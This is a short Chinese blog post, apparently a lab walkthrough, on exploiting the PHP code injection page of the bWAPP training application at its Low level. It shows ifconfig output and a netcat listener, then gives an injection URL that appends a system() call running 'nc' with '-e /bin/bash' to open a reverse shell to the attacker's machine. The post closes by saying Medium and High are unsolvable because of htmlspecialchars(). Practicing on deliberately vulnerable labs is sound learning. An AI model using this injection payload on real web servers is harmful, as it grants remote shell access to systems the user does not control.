版权声明:本文为博主原创文章,未经博主允许可以转载,但转载时请附上原文地址: https://blog.csdn.net/youshaoduo/article/details/81778007
Low:
打开Mac的终端,输入ifconfig查看本机IP:
➜ ~ ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
options=1203<RXCSUM,TXCSUM,TXSTATUS,SW_TIMESTAMP>
inet 127.0.0.1 netmask 0xff000000
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1
nd6 options=201<PERFORMNUD,DAD>
gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
stf0: flags=0<> mtu 1280
XHC20: flags=0<> mtu 0
en5: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=4<VLAN_MTU>
ether 00:e0:4c:36:09:77
nd6 options=201<PERFORMNUD,DAD>
media: autoselect (none)
status: inactive
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
ether 98:01:a7:a8:05:3f
inet6 fe80::18e2:f23d:250:5c25%en0 prefixlen 64 secured scopeid 0x6
inet 10.0.3.172 netmask 0xffffff00 broadcast 10.0.3.255
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active然后使用nc命令监听本地7890端口:
➜ nc -v -l 7890
然后直接在bWAPP的地址栏里输入http://localhost/bWAPP/phpi.php?message=test;system('nc 10.0.3.172 7890 -e /bin/bash')按回车,即可在Mac上拿到Shell。
Medium and High:
因为使用了htmlspecialchars()函数过滤,所以无解。